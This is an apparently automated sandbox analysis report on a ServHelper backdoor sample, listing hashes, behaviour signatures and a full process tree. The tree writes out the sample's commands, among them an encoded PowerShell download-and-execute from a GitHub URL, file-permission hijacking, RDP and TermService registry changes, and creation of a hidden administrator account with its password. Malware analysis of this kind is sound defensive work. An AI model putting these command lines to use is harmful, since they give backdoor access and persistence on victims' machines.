Analysis
-
max time kernel
131s -
max time network
127s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-01-2022 23:41
Static task
static1
Behavioral task
behavioral1
Sample
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
Resource
win10v2004-en-20220112
General
-
Target
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe
-
Size
4.5MB
-
MD5
d9825d1424b9058fd87f5bb6e808346a
-
SHA1
21980e67e2bba65b9753021e9091c2ab7c99f3e3
-
SHA256
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3
-
SHA512
7359f0bc4f06f48b8a60764ba142bf7650cee52cfa8499142686c846abc8366faf6f8746573ec370eef64e6c92b5999e8e22f9521c4da91626d7d783883a0cef
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1500 powershell.exe 6 1500 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 268 takeown.exe 1708 icacls.exe 1080 icacls.exe 960 icacls.exe 760 icacls.exe 868 icacls.exe 1052 icacls.exe 1220 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1368 1368 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid process 760 icacls.exe 868 icacls.exe 1052 icacls.exe 1220 icacls.exe 268 takeown.exe 1708 icacls.exe 1080 icacls.exe 960 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RLTM6XRWF4RBA2CAEEXC.temp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f071eba30417d801 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1324 powershell.exe 1204 powershell.exe 1328 powershell.exe 1696 powershell.exe 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 1500 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 464 1368 1368 1368 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeRestorePrivilege 1080 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeAuditPrivilege 1956 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeAuditPrivilege 1956 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 884 WMIC.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeAuditPrivilege 884 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 884 WMIC.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeAuditPrivilege 884 WMIC.exe Token: SeDebugPrivilege 1500 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 604 wrote to memory of 1324 604 a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe powershell.exe PID 604 wrote to memory of 1324 604 a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe powershell.exe PID 604 wrote to memory of 1324 604 a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe powershell.exe PID 1324 wrote to memory of 1276 1324 powershell.exe csc.exe PID 1324 wrote to memory of 1276 1324 powershell.exe csc.exe PID 1324 wrote to memory of 1276 1324 powershell.exe csc.exe PID 1276 wrote to memory of 1352 1276 csc.exe cvtres.exe PID 1276 wrote to memory of 1352 1276 csc.exe cvtres.exe PID 1276 wrote to memory of 1352 1276 csc.exe cvtres.exe PID 1324 wrote to memory of 1204 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1204 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1204 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1328 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1328 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1328 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1696 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1696 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 1696 1324 powershell.exe powershell.exe PID 1324 wrote to memory of 268 1324 powershell.exe takeown.exe PID 1324 wrote to memory of 268 1324 powershell.exe takeown.exe PID 1324 wrote to memory of 268 1324 powershell.exe takeown.exe PID 1324 wrote to memory of 1708 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1708 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1708 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1080 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1080 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1080 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 960 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 960 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 960 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 760 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 760 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 760 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 868 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 868 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 868 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1052 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1052 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1052 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1220 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1220 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1220 1324 powershell.exe icacls.exe PID 1324 wrote to memory of 1632 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1632 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1632 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1304 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1304 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1304 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1320 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1320 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1320 1324 powershell.exe reg.exe PID 1324 wrote to memory of 1064 1324 powershell.exe net.exe PID 1324 wrote to memory of 1064 1324 powershell.exe net.exe PID 1324 wrote to memory of 1064 1324 powershell.exe net.exe PID 1064 wrote to memory of 1800 1064 net.exe net1.exe PID 1064 wrote to memory of 1800 1064 net.exe net1.exe PID 1064 wrote to memory of 1800 1064 net.exe net1.exe PID 1324 wrote to memory of 2036 1324 powershell.exe cmd.exe PID 1324 wrote to memory of 2036 1324 powershell.exe cmd.exe PID 1324 wrote to memory of 2036 1324 powershell.exe cmd.exe PID 2036 wrote to memory of 824 2036 cmd.exe cmd.exe PID 2036 wrote to memory of 824 2036 cmd.exe cmd.exe PID 2036 wrote to memory of 824 2036 cmd.exe cmd.exe PID 824 wrote to memory of 1700 824 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe"C:\Users\Admin\AppData\Local\Temp\a81d0099ecd54a32aa6b858544b82a809237cddc903b45b032618d93ef7f70f3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qjdeca6i.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES733.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC722.tmp"4⤵PID:1352
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:268
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1708
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:960
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:760
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:868
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1052
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1220
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1632
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1304
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1320
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1800
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1312
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1188
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1028
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1120
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1252
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1008
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1416
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc yrP5BRJo /add1⤵PID:536
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc yrP5BRJo /add2⤵PID:1764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc yrP5BRJo /add3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1756
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:268
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD1⤵PID:1900
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD2⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD3⤵PID:868
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1156
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:640
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc yrP5BRJo1⤵PID:1064
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc yrP5BRJo2⤵PID:1244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc yrP5BRJo3⤵PID:1800
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1960
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2016
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:808
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
4848ac7fdcb21aa84e1f3e1e6493c2c6
SHA12f324fc6c955f27aa3c9d74569ceb12c2a098ce9
SHA256a1c0a92dec2be27212f43f7d30de6fdd6ff9f9ee8fea4e68dcf0eeeb538ffbab
SHA51208d0f9b0cb2c74a652eb00b1726e54adc3ebb0ce4496a19fe8b93377dce1042993f86b049853c7b5d2bd61ca64c0457021d5b174edecb891ab90d1a7d5d9a660
-
MD5
c3bd087b3dd5f108dba9d5fa37594577
SHA1fe9287709bbfd05f869413568542da1e9eee3cc2
SHA256c934a26be1b82c739208cd538a7a874dc39eb7bf7f14a0b9addc6d12cb3b2a0e
SHA5129fe98684b8f4f36f85bc67f8a632b016f6304370ed7caa02ccd49fb513bb1e545c659f1234279d02409b445267367858d1651a85773f2c5d7a67988b4504383d
-
MD5
7df180824a3d51215162b491741696e9
SHA1672b098adab81282546920b1cf3d176eb99a0d58
SHA256bb910aee936e13dff52cdc3b16a8d7cfd32df12ffb2645aae93d6a09c4601f95
SHA512dcc1ccd33a6784bffa35c51af6c5a95137aa14dd0f6cb008563a891d469662a940b6ad8a5871baa6378eb6b5510d268b92193ee19e7bf097924b2d9d393a92a3
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
01e075558a0ce4e9014ce25634f73c8f
SHA10065436d4d8817d2d642f17d94ee57efc1a9089c
SHA256b376725ce3b80dad76ff4bfab1172c46557b39a915456f725891b86e414564ab
SHA51238747148f0d6dce0538dd11a39e488f7ffc50cf1ea4595b13b6252683161ba16e0d53a594c8ae2017d6d62f8ca4620c31796ebee9cfa75f309a0979657a950cb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5093f2b83511ff4a41d6fca9de7e02c12
SHA1eccc59d2370cdf586f07d4fe00aefad9ec6d936c
SHA25661cd1bb52966a9a01efe3a9745ba709d7d1a348695a93bcd32c9a33598c0a502
SHA51230c6b4edb2436bddd90893b9cc02226ee40fb0d13365b9644aad4f3c62a6919d757a03c6ca336c555d1dcb5460e6bbd32c9d5a8ff37480fd82183e06505527b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5093f2b83511ff4a41d6fca9de7e02c12
SHA1eccc59d2370cdf586f07d4fe00aefad9ec6d936c
SHA25661cd1bb52966a9a01efe3a9745ba709d7d1a348695a93bcd32c9a33598c0a502
SHA51230c6b4edb2436bddd90893b9cc02226ee40fb0d13365b9644aad4f3c62a6919d757a03c6ca336c555d1dcb5460e6bbd32c9d5a8ff37480fd82183e06505527b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5093f2b83511ff4a41d6fca9de7e02c12
SHA1eccc59d2370cdf586f07d4fe00aefad9ec6d936c
SHA25661cd1bb52966a9a01efe3a9745ba709d7d1a348695a93bcd32c9a33598c0a502
SHA51230c6b4edb2436bddd90893b9cc02226ee40fb0d13365b9644aad4f3c62a6919d757a03c6ca336c555d1dcb5460e6bbd32c9d5a8ff37480fd82183e06505527b9
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
7b395d40a5f152c25fd6a70513a51fd2
SHA1c0a9e4bae4c9893c59ec792b6c82eb14f1c5a5bd
SHA2569af116841e92558b14703f2aed9994d0792ccffe7a79a23cbd4daa39dc05f033
SHA512bf65e548b30f41e419a954450d1c2858426882ac27f21b52c05a8258fbfb0724fc8338d08b480076724a00630f8a5f4bdbeebe44072f76292b4f01249a657fca
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
9851312bb695cee6cc1173ac497a212e
SHA1f4fa36b5d1e0ecf9c657967232dc1c8787a53d41
SHA2562dbff328733c666442b60dccc2b2fe938863eb8e6203e762dd6d4991cadd4f15
SHA5124d9aa40f115e056c849a06ea3f2db51a4ac2a8d8a2f17eac00a69d75746da61b096d9bc0d316c89caa626f7d9115c6b4e982045c1f448ca17dd7e3ec03a12a1e
-
MD5
d0990c13899f52c37abc4a8f87d9437f
SHA108e1b77cc789e9c9eb5aa6bfaeadaf8bb496d4b7
SHA256609984cc5c94524861703155fb251c960f14c8fa208993dcc3fd4cad807e5617
SHA51288b3dd58bbe5d087c82beb954539cf77c1aac48d7068c83eed7eb51a1a28e43c0c7d12fd483054336fc8143b31dda9b2ef60592b0aa2c4fd78b750c9618538bb
-
MD5
7dba4ba1a7798d8aa3a2acae8fb5e1b1
SHA13efd9f454975a605233b95543b3efad429563dd2
SHA2569d4814ab60ee09814ef0edac4a895e82d202a1569f5ec60e3dd39c1ea11a204e
SHA512bf62d952003224dd73b490fa732d767d6af580944e0cf973005eaa125c5efe2377927dbd9ae075656aa6ea8590f0eeefc5b11a9643909bbf4532e8d8bcfb9f71